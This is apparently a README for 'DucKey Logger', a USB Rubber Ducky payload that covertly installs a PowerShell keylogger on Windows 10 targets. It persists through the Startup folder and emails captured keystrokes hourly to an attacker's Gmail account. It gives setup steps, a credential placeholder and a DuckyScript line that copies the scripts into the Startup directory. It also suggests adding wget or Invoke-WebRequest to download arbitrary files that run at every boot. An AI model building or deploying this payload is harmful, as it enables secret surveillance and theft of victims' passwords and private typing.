Chris Taylor [Blue Cosmo] | 08/24/21
::::::::: ::: ::: :::::::: ::: ::: :::::::::: ::: :::
:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#+ +:+ +#+ +#++:++ +#++:++# +#++:
+#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+# #+#
######### ######## ######## ### ### ########## ###
An New Version of This Payload Is Available HERE
DucKey Logger is a USB RubberDucky payload that uses PowerShell to log keystrokes
- moves c.cmd file to windows startup directory
- c.cmd will secretly run p.ps1
- p.ps1 will log keystrokes
- l.ps1 will email the logs every startup and every hour [via SMTP]
- sends logs hourly, regardless of system time
- Twin-Duck firmware
- Gmail account
- i suggest making a separate Gmail account for this payload
- your Gmail must have LSA Access enabled
- Windows 10 Target
Set-Up/Installation
- change Gmail credentials in p.ps1
# gmail credentials
$email = "[email protected]"
$password = "password"- in line 20 of payload.txt, change 'L' to the name of your ducky [SD Card]
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";- flash Twin-Duck firmware on to your duck
- load, encode, and deploy!!
The c.cmd attack opportunity
the c.cmd file runs every startup.
this means an attacker could place a
'wget' or 'Invoke-WebRequest' and have a file
be downloaded from anywhere on the internet onto the computer.
the file would then save in the startup directory,
allowing it to run every startup
- hope you enjoy the payload!!
- please subscribe to my YouTube channel :)